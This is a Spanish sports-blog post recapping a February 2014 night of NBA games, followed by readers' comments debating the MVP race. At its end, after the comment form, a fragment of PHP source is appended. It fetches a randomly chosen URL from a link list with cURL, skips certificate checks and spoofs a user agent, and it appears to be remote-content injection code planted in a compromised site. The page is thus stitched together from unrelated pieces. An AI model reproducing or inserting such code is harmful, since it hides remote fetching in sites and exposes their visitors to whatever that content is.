La Crónica: Dominador

13 de February de 2014 por Simon

Muchos partidos y muchas cosas que contar de la madrugada del miércoles entre las que destacan las canastas ganadoras de Lebron James y James Harden. “King” James se puso el traje de MVP y dominó el partido en el Oracle como sólo él puede actualmente. Para los Warriors, el partido fue un reflejo de lo que está siendo su temporada. Comenzaron de manera estrepitosa, con los Heat campando a sus anchas y alcanzando la veintena de puntos de ventaja mediado el tercer cuarto. Fue en ese momento cuando los locales parecieron despertar y con unos cuantos minutos de genialidad consiguieron equilibrar el marcador. Los últimos compases del choque fueron preciosos con ambos equipos mostrando su mejor juego pero apareció la figura de Lebron y con dos triples en el último minuto, uno de ellos prácticamente sobre la bocina para ganar el encuentro, dio al traste con las ilusiones de los Warriors (111-110). Menos espectacular fue la otra canasta ganadora de la noche obra de Harden. Con dos arriba para los Wizards a falta de 4 segundos Ariza empañó su gran noche cometiendo una falta de pardillo sobre Harden cuando el balón ni siquiera estaba en juego. El resultado de esa acción fue la expulsión por sexta falta del alero de los Wizards además de tiro libre y posesión para Houston. Harden anotó el libre para poner a su equipo a uno y en el saque de banda un gran bloqueo de Howard le permitió recibir en una buena posición y poner la directa hacia la canasta y anotar la bandeja ganadora (112-113). Con esta victoria los Rockets asaltan el tercer puesto de la conferencia oeste. 

Precisamente el equipo que ostentaba hasta ahora la tercera plaza de la conferencia eran los Blazers que ayer perdieron en el Staples ante Los Angeles Clippers. Desde el partido de ayer un servidor anda con los dientes largos ante la posibilidad de que semejante partidazo se pudea repetir en primera ronda de Play Off como así sucedería si hoy mismo comenzaran las eliminatorias. El encuentro de ayer fue uno de los mejores de la temporada con dos equipos jugando a un grandísimo nivel y con ventajas insignificantes en todo momento. En los últimos minutos los Clippers demostraron que son un equipo más curtido y consiguieron amarrar la victoria en casa (117-122). Aunque suene a estupidez, la baja de Chris Paul les ha venido de perlas. Durante su ausencia, Blake Griffin ha dado el paso adelante que todos le pedíamos y ahora con Paul de vuelta los Clippers son aún más temibles si cabe. Está preciosa la lucha por el tercer puesto de la conferencia, una lucha en la que si los Spurs siguen sufriendo bajas y perdiendo más partidos de la cuenta podrían verse metidos de lleno en las próximas fechas. Ayer al menos consiguieron una victoria en el Garden que les da de momento algo de colchón respecto a sus perseguidores (104-92).

En una jornada tan larga como la de ayer también encontramos algunas sorpresas como la victoria de los Kings, con prórroga incluida, en el Madison (106-101). Aunque si lo pensamos bien viniendo de los Knicks ya nada sorprende.  Más llamativa es sin duda la victoria de los Mavericks en la pista de los Pacers. Pocos podían augurar una victoria de Dallas tras perder la noche anterior en Charlotte y tener a Dirk tocado del tobillo. El partido se disputó bajo las directrices que le gustan a Indiana: partido lento y con ambos equipos sufriendo para anotar, pero en el último cuarto los Pacers simplemente desaparecieron de la pista y pusieron en bandeja la victoria a Dirk, Ellis y compañía (81-73). Con esta victoria inesperada los Mavs se colocan sextos y dejan a los Warriors octavos y mirando por el retrovisor a unos Grizzlies que no frenan, que siguen consiguiendo victorias aquí y allá y que cada vez están más cerca de pelear por el título. Ayer sufrieron pero se llevaron la victoria del Amway Center de Orlando (86-81). A pesar de la victoria, ayer fue un día negro para los Grizzlies ya que Marc Gasol volvió a caer lesionado de su rodilla izquierda y hoy se le realizarán pruebas para descubrir si tiene dañado algún ligamento. Con Marc out, los Grizzlies lo tendrán muy complicado para entrar a Play Off.

En la zona de Play Off del Este hubo algunos enfrentamientos directos. Los Raptors vencieron con contundencia a los Hawks en un duelo vital por el tercer puesto de la conferencia (83-104) y los Nets continúan su escalada en el Este venciendo a los Bobcats también sobradamente (89-105). Tras los resultados de ayer entre el tercer y el séptimo equipo hay tan sólo tres partidos de diferencia. Puede ocurrir cualquier cosa.

En el resto de la jornada, tenemos el duelo de las dos grandes decepciones de la temporada, Cavs y Pistons, que se llevaron los de Mike Brown gracias a un buen último cuarto en el que Detroit se vino abajo como casi siempre (93-89); Pelicans venció a domicilio a los Bucks, el peor equipo de la liga (102-98); Minnesota apabulló a los Nuggets con Love rozando el triple doble (90-117) y los Jazz vencieron a los Sixers (100-105).

PREMIOS

MVP: 36 puntos, 9 asistencias, 13 rebotes, 2 robos y el triple que da la victoria a su equipo. Lebron James piensa luchar por el MVP hasta el último día.

Rookie: Michael Carter-Williams le ganó sobradamente la partido a Trey Burke en el duelo que les enfrentaba directamente. El de los Sixers anotó 19 puntos, cogió 5 rebotes, repartió 8 asistencias, robó 2 balones y puso 3 tapones. Kelly Olynyk consiguió un doble con 15 puntos y 10 rebotes.

Sorpresa: Bien cerca del triple se quedó Marco Bellinelli (16-11-8); Gustavo Ayón jugó un muy buen partido ante los Raptors (18 puntos, 10 rebotes y 3 robos), y Jimmer Fredette recordó un poco al jugador que maravilla en la universidad (24 puntos con 6 triples).

Decepción: Vaya partidito que se marcó Luol Deng. Falló los 9 tiros que intentó y acabó el partido con solo 4 puntos. Aún más tiros falló Jeff Green. Llegó a los 10 puntos pero tras un 4 de 17.

Esfuerzo en vano: Los 32 puntos y 11 rebotes de Trevor Ariza se quedaron en nada por culpa de la bandeja en el último momento de James Harden. La victoria hubiera sido un bonito colofón para una noche de récords: mejor registro anotador para Ariza y mayor número de triples anotados de los Wizards (10). Yo le perdono lo de su falta al escolta de los Rockets.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

20 comentarios a esta entrada

  1. rumbero dice:
    #1

    Ha sido empezar febrero y Lebron se ha puesto en modo bestia. Todo en orden pues.
    Un tema que da para artículo son las carajas de los Warriors. No se cuantas veces les he visto esta temporada hacer lo mismo pero da la sensación que son muchísimas. El tema es que si en PO se ponen serios y no lo fían todo a la dinamita que tienen se pueden ventilar a cualquiera, sino lo llevan claro viendo lo que les puede tocar en primera ronda.
    Y otro tema que da para artículo sería “Los Rockets se compran un adosado en la línea de tiros libres”. 47 para ellos, 16 para los Wixards. Todo en orden también.

      Citar

  2. Esteban dice:
    #2

    atento que el parón dle all-star no les pudo haber venido mejor a los pacers que vienen de capa caída hace rato
    desde el partido con los suns los pacers están 7-5, es decir, han perdido 7 de sus 12 partidos en el ultimo mes

    derrotas han sus dos veces, denver, orlando y dallas, solo maquillados por que son demasiado buenos como para hundirse y en el medio logran 4 victorias seguidas, pero sin dudas, el record actual de 40-12, era de 33-5 hace un mes, su merma es notoria

      Citar

  3. TheDeerHunter dice:
    #3

    Son 7 los ganados y 5 los perdidos, Esteban.
    De todas formas de acuerdo con el fondo de tu comentario.

      Citar

  4. Ruxixon dice:
    #4

    Está claro lo que le pasa a Deng,veremos que equipo elige para jugar la temporada que viene.

    Un seguidor que tiene a LeBron y Curry como los jugadores que más le gustan el partido de ayer es pura crema,ójala se junten algún día en el mismo equipo.100 % recomendable ver el partido de ayer.

    PD.¿cómo veis la carrera por el MVP?¿Durant,LeBron y Blake,por este orden?

      Citar

  5. Esteban dice:
    #5

    Ruxixon:

    PD.¿cómo veis la carrera por el MVP?¿Durant,LeBron y Blake,por este orden?

    no es por que yo no quiera a Griffin, reconozco su temporadon superando mis bajas expectativas, pero a la vez no entiendo como algien lo puede colar en la lista de candidatos al MVP, cuando lebron y durant estan a un mundo de distancia

    un escalon por detras vienen george y Aldrigue, y no veo a Griffin y su 4to puesto del oeste a la altura de estos dos, mas vale lo veo a la altura de parker, curry, derozan y dirk

      Citar

  6. dunc dice:
    #6

    Yo tampoco veo a Griffin en la lucha por el MVP ni de broma.

    Y por otro lado yo también amo a Curry y a LeBron, y por eso mismo espero no verles nunca compartiendo equipo. No entiendo esa preferencia por juntar a los mejores, para mi como espectador es mucho mejor la competencia entre ellos.

      Citar

  7. Jose Luis dice:
    #7

    Pues la falta de Ariza es de risa, de hecho Harden se tira y agarra a Ariza para que se vaya con él y piten la falta…

      Citar

  8. TheDeerHunter dice:
    #8

    ¿En serio me estás diciendo que la temporada de Blake Griffin es comparable a la de Parker, Curry, DeRozan y Dirk? Pero… todos juntos ¿no?
    Qué chispa tienes… XD XD XD XD

    Edito para pronunciarme y que no lleve a malos entendidos. Para mí Durant es el 1º de largo. LeBron segundo a cierta distancia y después a priori estaba Aldridge. Durante la baja de CP3 Griffin esencialmente ha alcanzado a Aldridge tanto cuantitativa como cualitativamente. Ambos por encima de Paul George que se ha relajado bastante.
    Lo de Griffin por el MVP no es que lo diga yo, o se cante por aquí… es algo de lo que se habla abiertamente en la mayoría de medios especializados. Sólo había que darse una vuelta por ahí tras el partidazo ante Miami.
    El resto de comparaciones… son de chiste.

      Citar

  9. Jose Luis dice:
    #9

    Hombre con Dirk se ha pasado, y quizá Parker xd

    Pero dudo que Griffin se lleve algún voto… en cambio no me extrañaría verle alguno a Curry o DeRozan, quizá hasta Parker si quedan primeros los Spurs. Aldridge también, pero Griffin, yo al menos no creo que se lleve ni un solo voto.

      Citar

  10. Esteban dice:
    #10

    ok sera que yo no he leido a los medios especializados, pero no he visto a nadie que lo ponga en la carrera de MVP, si bien desde la lesion de CP3 griffin ha jugado a un nivel nunca visto y casi apenas insinuado en su año rookie, igualmente no lo veo peleando por el MVP, como mucho esta en el mismo escalon de George, como mucho, uno por debajo de aldrigue (que este a la vez esta 15 escalones de los dos dioses), Grifin esta metiendo al dia de hoy a su equipo 4to o 5to, no termina de ser nada del otro mundo

    ahora si los clippers levantan vuelo y terminan 1eros o d2dos, la cosa puede cambiar

      Citar

  11. rumbero dice:
    #11

    Esto varía en cuestión de semanas, hay que valorarlo a final de temporada. Obviamente se lo van a jugar Durant y Lebron , pero así como hace poco parecía que el primero iba disparado a por el premio hay que ver como acaba la temporada James y Miami que aún queda mucho y ya los conocemos.
    El resto lo que comento, a día de hoy yo si metería a Griffin tercero, hace un mes hubiera puesto a George o Aldridge e igual de aquí dos semanas a Paul si vuelve por sus fueros.

      Citar

  12. Esteban dice:
    #12

    James estaba viendo como Durant se eregia como el mejor jugador del mundo en sus narices, se ha cargado pilas y demuestra que si lo quieren son numeros, el puede hacerlo a montones
    sin dudas que estaba jugando en piloto automatico, se ha puesto pilas y demuestra por que es el mejor alero de la historia de este deporte

      Citar

  13. Sancho88 dice:
    #13

    Vamos a ver… primero, Durant MVP claramente. Este año ya le toca. Es como lo de Messi y Cristiano, no siempre le pueden dar el balón de oro al mismo, hay que ir turnándose para que no huela a tongazo padre. Yo soy muy amigo de los premios compartidos. Me pareció muy injusto no darle el MVP de las finales de 2010 a Pau y sí dárselo a Bryant. Debería haber sido compartido. Entonces, con estos dos pasa lo mismo, decir que uno de los dos es mejor que el otro, como decir que Ronaldo es mejor que Messi o viceversa, es faltar a la verdad. Ambos duos, en ambos deportes, han tenido la suerte o desgracia (según se mire, para mí una gran suerte por lo vistoso que es para el aficionado compararles ‘in situ’), de coincidir en la misma época.

    Entonces, si decidimos que el premio es individual, el año pasado fue para LeBron por pequeños matices, y este año será para Durant por lo mismo. No se pueden sacar los números y empezar a comparar como si esto fueran las notas del colegio. Pues yo he sacado un 9 en cono y tú un 8,9… ale, yo soy mejor que tú… no. Entonces el premio muchas veces se da por sensaciones. El mes de enero de Durant simplemente es para mear y no echar gota. Ha estado a 4 partidos de batir el record histórico de más partidos consecutivos anotando al menos 30 puntos, y la sensación es que este año no hay ningún jugador en todo el mundo capaz de hacer eso.

    Ahora, por ejemplo, LeBron está espabilando, pero ese partido que jugó contra Utah ha dado la sensación de una temporada incompleta, aunque ahora ha puesto otra vez el modo bestia On, y ya no lo va a dejar seguramente hasta final de temporada.

    Es decir, la pelea está ahí, y estará ahí hasta el último partido de la regular, pero ahora mismo a los puntos Durant está por encima, no demasiado por encima, pero sí lo suficientemente por encima como para decir claramente que ser merece el MVP sin discusiones.

    ¿Por detrás? Obviamente Blake Griffin. Y negar esto es querer ampararase en un artículo, Esteban, que se te ha caído por la taza del váter completamente. Eres muy bueno haciendo valoraciones cuando el jugador la caga, y decir que la cagó, pero no tan bueno haciendo advinaciones a futuro, como se ha comprobado. Blake se ha comido tu artículo y se ha convertido en un tío peligrosísimo, solo un ‘pelín’ menos peligroso que James o Durant, pero a la altura de Carmelo Anthony y Chris Paul cuando vuelva a sus numeracos.

    Así, voy a dejar mis escalones estos famosos que estamos haciendo de cracks absolutos, según lo que está ocurriendo esta temporada (hago la puntualización porque sé que me vais a dar palos; Carmelo segundo escalón, sin él los Knicks estarían disputándose la cuchara de madera con los Bucks):

    1º escalón: Kevin Durant y LeBron James
    2º escalón: Blake Griffin y Carmelo Anthony… y venga, sí, LaMarcus Aldridge
    3º escalón: Damian Lillard, Paul George, Tim Duncan, Stephen Curry, Dwight Howard, Chris Bosh, Anthony Davis, Al Jefferson, Paul Millsap, Dirk Nowitzki, James Harden
    4º escalón: LaZorra, Lowry, Dragic, Cousins, David Lee, Pau Gasol, Roy Hibbert, Noah, Wall, Parker, Drummond, Irving, West, Randolph, DeAndre Jordan, Ibaka

    Puede que alguno del 4º escalón merezca estar en el 3º escalónk, y viceversa. Pero bueno, así a bote pronto este es mi orden jerárquico de la liga ahora mismo

    Para mí, así estaría estructurada la jeraquía de la liga ahora misma, los jefes, los malotes, los que mandan

      Citar

  14. Esteban dice:
    #14

    ok sancho88 no comparto practicamente en absoluto, lo de griffin a la altura individualmente de anthony y cp3 no lo veo asi, por el contrario, tuvo un mes sin cp3 fantastico, pero antes de eso venia a los tumbos (algo mejor que el año anterior es cierto, pero nada del otro mundo) y habra que ver como sigue…

    poner a carmelo como psuedo candidato al MVP o meterlo segundo en valoracion cuando su equipo, uno de los mas grandes de la liga y que mas gasta esta fuera de PO es casi ridiculo, o bueno asi lo veo yo

      Citar

  15. Esteban dice:
    #15

    Sancho88:

    Para mí, así estaría estructurada la jeraquía de la liga ahora misma, los jefes, los malotes, los que mandan

    esto si me gusto, “los que mandan”, nunca mejor dicho

    hace 2 años atras entre los que mandan, sin dudas se incluian Rose y Howard, pero las lesiones…

    un tema interesante por otra parte son los fisicos de Lebron y Durant, estos tios no se lesionan nunca? cuantos partidos se han perdido en sus carreras?

      Citar

  16. TheDeerHunter dice:
    #16

    Esteban:
    ok sera que yo no he leido a los medios especializados, pero no he visto a nadie que lo ponga en la carrera de MVP, si bien desde la lesion de CP3 griffin ha jugado a un nivel nunca visto y casi apenas insinuado en su año rookie, igualmente no lo veo peleando por el MVP, como mucho esta en el mismo escalon de George, como mucho, uno por debajo de aldrigue (que este a la vez esta 15 escalones de los dos dioses), Grifin esta metiendo al dia de hoy a su equipo 4to o 5to, no termina de ser nada del otro mundo

    ahora si los clippers levantan vuelo y terminan 1eros o d2dos, la cosa puede cambiar

    Esteban, deberías saber que yo no me invento las cosas… pero no hace falta que me creas simplemente puedes poner en el buscador Griffin y MVP y verás si alguien lo pone en la carrera del MVP o no. Te facilito el trabajo…
    http://cut.by/5PAOG
    http://cut.by/4C6Yq
    Espero que te valgan ESPN y NBA.com como fuentes sufientemente respetables.

    Respeto que no te parezca MVP. En realidad yo únicamente tengo un candidato real y no es él.
    Comentar que “ha dado tumbos” en algún momento del curso es una absoluta alucinación.
    Quizá el problema es que tienes a los Clippers en más alta consideración que la mayoría. Permíteme decirte que sin Chris Paul los Clippers no son parte alta del cuadro en esta conferencia. El nivel brutal de Griffin es lo que ha permitido mantener el tipo el último mes (y por cierto, a ese nivel no ha llegado Aldridge)
    Tener el balance que tienen a estas alturas no sólo que no es malo, sino que es cojonudo. Seguramente con Paul los vamos a volver a ver subir posiciones.

      Citar

  17. Esteban dice:
    #17

    jajajaja dije que yo no entre, no se ingles así que obviamente no se que dicen esas crónicas, una dice claramente que tiene nivel de MVP, ahora que diga que esta en carrera para ello no lo se
    Love tiene nivel y números de MVP pero no esta ni de coña en carrera para ganarlo

    Considero algo muy diferente tener nivel de MVP y estar en carrera para ganarlo, me explico? creo que hoy no hay nadie mas que Durant y Lebron en carrera para el MVP, por mas ganas que alguien le quiera ponerlo en dicho lugar

    ahora si los clippers ganan el oeste quizá tenga algo de color

      Citar

  18. Jose Luis dice:
    #18

    Esteban:
    Love tiene nivel y números de MVP pero no esta ni de coña en carrera para ganarlo

    Con respecto a Griffin, más claro imposible. Puedes hacer numerazos, y no por eso estar a nivel MVP o siquiera entrar en la carrera.

    Aún no le he visto una buena actuación en PO, o al menos que de forma regular sea un jugador importante. El año pasado 13-5 en PO, en 26 minutos de media… lesionándose en el 5º, si, pero solo jugó un partido lesionado, el 6º.

    A mi parecer, números bastante discretos.

      Citar

  19. Schize dice:
    #19

    Pero eso no quita que este año esté superando las expectativas incluso sin Paul al lado, ejerciendo de primera espada.
    No entrará en las quinielas para el MVP porque es cosa de 2, pero sin estas dos bestias que son James y Durant, para mi estaría entre Griffin y Aldridge. Y Portland se está desinflando (cosa se esperar, por otra parte).

      Citar

  20. Esteban dice:
    #20

    Schize:
    Pero eso no quita que este año esté superando las expectativas incluso sin Paul al lado, ejerciendo de primera espada.
    No entrará en las quinielas para el MVP porque es cosa de 2, pero sin estas dos bestias que son James y Durant, para mi estaría entre Griffin y Aldridge. Y Portland se está desinflando (cosa se esperar, por otra parte).

    bueno la discucion era si griffin esta o no en carrera al MVP, algunos consideran que si, yo por mi parte no

    que esta haciendo numeros de MVP? caray 24 puntos y 12 rebotes,m sobran para MVP, pero la verdad es que no lo veo en carrera, varios estan haciendo esos numeros y no estan en carrera, love, curry, derozan, anthony

    no es cuestion de numeros, pero como doije, si los clippers terminan primeros o segundos en el oeste y griffin es la primera espada desplazando a cp3, la cosa puede cambiar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>